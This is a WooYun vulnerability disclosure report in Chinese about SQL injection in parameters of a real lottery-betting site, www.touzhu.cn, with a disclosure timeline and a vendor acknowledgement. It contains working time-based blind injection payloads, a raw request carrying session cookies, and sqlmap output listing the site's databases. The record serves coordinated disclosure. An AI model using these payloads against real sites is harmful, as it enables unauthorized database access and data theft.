乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-23: 厂商已经确认,细节仅向厂商公开 2015-10-03: 细节向核心白帽子及相关领域专家公开 2015-10-13: 细节向普通白帽子公开 2015-10-23: 细节向实习白帽子公开 2015-11-07: 细节向公众公开
RT
1. www.touzhu.cn/news/newslist/*/_1.html 伪静态一处2. www.touzhu.cn/customer/ajax_findpass.php/actionc=checknickname&nickname=*&suijishu=0.10779594886116683&username=e 伪静态二处
GET /webllpay/return.php?a=hqp2008&c=500.00&key=rtiz65&m=*&user_id=hqp2008&valid_order=100&version=1.0 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.touzhu.cn:80/Cookie: PHPSESSID=69cbkfr3nooccakbg7763o4ct0; helpskaiguan=CaiSo; Hm_lvt_099264dbbc75fb6766d7d0a7155abbcc=1442884338,1442884446,1442884717,1442898093; Hm_lpvt_099264dbbc75fb6766d7d0a7155abbcc=1442898093; HMACCOUNT=457185A9BB06EA8F; box_wxts=on; bdshare_firstime=1442881660036; BAIDUID=DC1506772BE8531E2289EA15456B3920:FG=1Host: www.touzhu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
m处存在注入现在用sqlmap跑一下
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: actionc=checknickname&nickname=' AND (SELECT * FROM (SELECT(SLEEP(5)))yaYG) AND 'sgEm'='sgEm&suijishu=0.10779594886116683&username=e---web application technology: PHP 5.4.41back-end DBMS: MySQL 5.0.12No tables foundsqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.touzhu.cn:80/webllpay/return.php?a=hqp2008&c=500.00&key=rtiz65&m=' AND (SELECT * FROM (SELECT(SLEEP(5)))pZkW) AND 'SfwF'='SfwF&user_id=hqp2008&valid_order=100&version=1.0---web application technology: PHP 5.4.41back-end DBMS: MySQL 5.0.12sqlmap resumed the following injection point(s) from stored session:---
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://www.touzhu.cn:80/webllpay/return.php?a=hqp2008&c=500.00&key=rtiz65&m=' AND (SELECT * FROM (SELECT(SLEEP(5)))pZkW) AND 'SfwF'='SfwF&user_id=hqp2008&valid_order=100&version=1.0---web application technology: PHP 5.4.41back-end DBMS: MySQL 5.0.12available databases [12]:[*] asiancup2015[*] caiso[*] caiso_test[*] information_schema[*] mysql[*] performance_schema[*] phpstudy[*] starapp[*] starapp_test[*] test[*] whchem_com[*] yqjc
危害等级:高
漏洞Rank:15
确认时间:2015-09-23 12:06
谢谢路大关注.已经转给程序.
暂无